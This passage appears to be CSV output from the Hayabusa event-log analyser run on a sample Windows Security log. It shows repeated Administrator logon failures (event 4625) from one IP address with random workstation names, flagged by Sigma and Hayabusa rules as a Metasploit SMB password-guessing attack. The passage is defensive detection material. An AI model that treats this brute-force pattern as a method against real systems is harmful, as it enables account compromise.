Password,User: Administrator : Type: 3 : Workstation: J2iFr8ppe5NzukXF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EEUOBohBFRze6hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCOFn3WM71KmaZyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UdUkBxB1auduRfdS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2JaWoYK56HRGfW1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3JTCX9NIOpg6TFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zFGkdUVAdKcrrREB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oZW00FpKema01Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p4HbNQx0Acf83b1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aM5UCQbOLvcpI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BGGChEAIdej9lBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CaFYB1ImWAWbH0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLa3lkxWiJ00raQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMzyi0jIVLNrodC8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2repX0roAP2j0TI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gqcpIjdkNpmoTe4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edgo9UdNvmMJpiyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LpqOTu7Xn7ULipmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TP0efL79STMbuu9g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HkwWfRi0E5sVY6UT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IkyCe9NXGExCQS5r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IGnhRwa7P7by9vJO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fh7IGliNbSyKwxpM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1QfgWsAqSYQfB9l5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8VM66P8Vluf7yrL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cdYiwh3QjdA0Zoge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ou3FPUI5bFcUvuFC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMUg8N7apFtUgX9d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U7Cn4n7jQAQaxP6y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urflPvd1vgYYi2ra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pqFtTDD69fNTKROG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: teUZYpNyqJ64Dgcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9kaKSy3DV5fRKvTc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtiZUzpwrnuWIjna : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SD9UhsShNJRp251r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5xbL7aO0azgBxfz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xqrUpW8PpI9RAeGk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M80K04eYwfwdzIul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jcWY7cNeCNgJ3Czr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1OA561UrTkFnbEj3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: iDnu1G7jmwLoXGLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2v70poTOKPUNZJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhzoOmgTrdvTS27z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pyvmBFGhKFgvzM9S : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHC0keHW2YsKeP02 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29vkwuFa6njYc86s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s9687XPVHFiwttdm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
